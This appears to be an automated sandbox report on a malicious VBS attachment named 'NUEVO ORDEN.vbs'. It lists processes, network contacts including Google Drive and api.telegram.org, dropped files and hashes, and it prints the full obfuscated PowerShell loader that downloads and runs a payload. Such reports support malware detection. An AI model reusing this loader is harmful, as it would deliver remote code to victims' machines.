Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/2136-0-0x00007FFB9FBC3000-0x00007FFB9FBC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j0f0owhf.vrr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2136-10-0x00000291E00D0000-0x00000291E00F2000-memory.dmp

memory/2136-11-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-12-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-15-0x00007FFB9FBC3000-0x00007FFB9FBC5000-memory.dmp

memory/2136-16-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-19-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/368-20-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

memory/368-21-0x0000000005510000-0x0000000005B38000-memory.dmp

memory/368-22-0x0000000005440000-0x0000000005462000-memory.dmp

memory/368-23-0x0000000005B40000-0x0000000005BA6000-memory.dmp

memory/368-24-0x0000000005C30000-0x0000000005C96000-memory.dmp

memory/368-34-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

memory/368-36-0x0000000006330000-0x000000000634E000-memory.dmp

memory/368-37-0x0000000006360000-0x00000000063AC000-memory.dmp

memory/368-38-0x0000000007BA0000-0x000000000821A000-memory.dmp

memory/368-39-0x00000000068C0000-0x00000000068DA000-memory.dmp

memory/368-40-0x00000000075C0000-0x0000000007656000-memory.dmp

memory/368-41-0x0000000007550000-0x0000000007572000-memory.dmp

memory/368-42-0x00000000087D0000-0x0000000008D74000-memory.dmp

C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo

MD5 15d4bf8d1435c92eafc43ebdff22b873
SHA1 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256 ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c

memory/368-44-0x0000000008D80000-0x000000000E548000-memory.dmp

memory/3036-57-0x0000000000C10000-0x0000000001E64000-memory.dmp

memory/3036-58-0x0000000000C10000-0x0000000001E64000-memory.dmp

memory/3036-59-0x0000000000C10000-0x0000000000C58000-memory.dmp

memory/3036-60-0x00000000256B0000-0x000000002574C000-memory.dmp

memory/3036-62-0x0000000026340000-0x0000000026502000-memory.dmp

memory/3036-63-0x0000000025B10000-0x0000000025B60000-memory.dmp

memory/3036-65-0x0000000026210000-0x00000000262A2000-memory.dmp

memory/3036-66-0x0000000026180000-0x000000002618A000-memory.dmp